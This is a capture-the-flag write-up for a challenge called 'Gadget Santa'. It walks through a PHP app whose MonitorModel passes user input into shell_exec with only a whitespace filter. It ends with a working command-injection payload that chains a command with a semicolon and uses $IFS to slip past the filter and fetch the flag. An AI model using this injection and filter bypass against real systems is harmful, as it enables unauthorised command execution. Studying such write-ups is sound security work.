Skip to main content

Day 3: Gadget Santa

challenge description
It seems that the evil elves have broken the controller gadget for the good old candy cane factory!
Can you team up with the real red teamer Santa to hack back?

Playing around

Looking at the source code, we see it is a PHP application. Ahh... So many attack vectors!

One aspect caught my eye:

class MonitorModel
public function __construct($command)
$this->command = $this->sanitize($command);

public function sanitize($command)
$command = preg_replace('/\s+/', '', $command);
return $command;

public function getOutput()
return shell_exec('/ '.$this->command);

Shell_exec??? What is this santa_mon script? And it also concat user supplied commands to it with a filter for whitespace?

The answer is obvious. Code injection! Simply use semicolons and add more commands!


However, we need a way to bypass the whitespace filter and get the flag from the /get_flag endpoint... Introducing $IFS!

Using the payload ?command=;curl$IFS%22http://localhost:3000/get_flag%22, we managed to get the flag!